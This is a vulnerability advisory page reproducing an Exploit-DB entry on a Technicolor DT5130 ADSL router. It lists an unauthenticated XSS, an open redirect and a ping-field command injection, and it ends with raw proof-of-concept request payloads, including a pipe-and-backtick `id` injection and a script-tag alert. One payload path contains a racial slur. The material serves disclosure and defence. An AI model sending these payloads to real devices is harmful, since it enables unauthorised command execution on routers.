Unauthenticated XSS, Arbitrary URL Redirect and Command Injection in ping field

vendor:

Wireless N ADSL 2/2+ Modem Router

by:

Ewerson Guimaraes (Crash)

8,8

CVSS

HIGH

Unauthenticated XSS, Arbitrary URL Redirect and Command Injection

79, 601, 78

CWE

Product Name: Wireless N ADSL 2/2+ Modem Router

Affected Version From: V2.05.C29GV

Affected Version To: V2.05.C29GV

Patch Exists: YES

Related CWE: CVE-2014-9142, CVE-2014-9143, CVE-2014-9144

CPE: h:technicolor:dt5130

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2014

Unauthenticated XSS, Arbitrary URL Redirect and Command Injection in ping field

The Wireless N ADSL 2/2+ Modem Router with firmware version V2.05.C29GV, manufactured by Technicolor and model DT5130, is vulnerable to Unauthenticated XSS, Arbitrary URL Redirect and Command Injection. An attacker can exploit this vulnerability by sending a specially crafted request containing malicious JavaScript code to the router. This code will be executed in the context of the user's browser. An attacker can also exploit this vulnerability by sending a specially crafted request containing a malicious URL to the router. This URL will be used to redirect the user to a malicious website. An attacker can also exploit this vulnerability by sending a specially crafted request containing a malicious command to the router. This command will be executed in the context of the router.

Mitigation:

Users should update their router to the latest version of the firmware. Additionally, users should ensure that they are using strong passwords for their router.

Source

Exploit-DB raw data:

Product: Wireless N ADSL 2/2+ Modem Router
Firmware Version : V2.05.C29GV
Modem Type : ADSL2+ Router
Modem Vendor : Technicolor
Model: DT5130

Bugs:
1- Unauth Xss - CVE-2014-9142
user=teste&password=teste&
userlevel=15&refer=%2Fnigga.html&failrefer=/basicauth.cgi?index.html?failrefer=<script></script><script>alert('TESTE')</script>"%0A&login=Login&password=pass&refer=/index.html&user=teste&userlevel=15&login=Login

2- Arbitrari URL redirect - CVE-2014-9143
failrefer=http://blog.dclabs.com.br&login=Login&password=
pass&refer=/index.html&user=1&userlevel=15

3- Command Injection in ping field - CVE-2014-9144
setobject_token=SESSION_CONTRACT_TOKEN_TAG%3D0123456789012345&setobject_ip=s1.3.6.1.4.1.283.1000.2.1.6.4.1.0%3Dwww.google.com.br|`id`&setobject_ping=i1.3.6.1.4.1.283.1000.2.1.6.4.2.0%3D1&getobject_result=IGNORE


-- 
Ewerson Guimaraes (Crash)
Pentester/Researcher
DcLabs / Ibliss  Security Team
www.dclabs.com.br / www.ibliss.com.br